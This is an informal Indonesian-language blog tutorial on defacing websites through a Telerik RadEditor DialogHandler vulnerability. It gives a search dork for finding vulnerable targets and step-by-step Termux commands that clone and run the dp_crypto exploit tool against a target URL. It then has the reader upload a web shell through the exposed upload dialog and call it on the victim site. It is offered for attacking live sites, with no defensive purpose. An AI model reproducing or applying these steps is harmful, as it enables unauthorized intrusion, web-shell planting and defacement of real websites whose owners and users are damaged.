Cara Deface Telerik Remote Code Execution

 

Assalamualaikum balik Lagi Ama gua di Sini KAKEGURAI Nah di Sini Gua Akan Berika Sebuah Tutorial Cara Deface Poc Telerik Langsung Aja...

Nah Ok Bahan-bahan 

1. Dork : inurl:/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx

2. Termux

3. Tool Exploiter Telerick

Ok Kalian Ngedork Dlu yang Gua Kasih Di Atas 

Kalo Udh Dorking Ada Text  "Loading the Dialog..."  Itu Berarti Vuln Seperti Contoh Gambar di Bawah 

$pkg install git -y

$pkg install pip

$git clone https://github.com/bao7uo/dp_crypto

$cd dp_crypto

$python3 dp_crypto.py k -u (masukkan website targetnya beserta Exploit nya)

Lalu Kalian Tunggu Proses Nya 

Kalo sudah Seperti Gambar di Bawah

Kalian copy semua Dan Langsung Paste Di Browser Kalian 

Setelah di copy kalian paste kan di Browser kalian dan jika berhasil maka akan ada tempat upload seperti gambar dibawah ini

Lalu kalian pencet tombol + warna hijau disana atau cari tulisan upload,lalu kalian upload Shell kalian atau script Lu

Kalau sudah Cara Manggil shell?

site.com/shell kalian

Ok wassalamu'alaikum warahmatullahi wabarakatu

Referensi : https://www.gx-teamofficial.xyz/2020/04/cara-deface-poc-telerik-live-target.html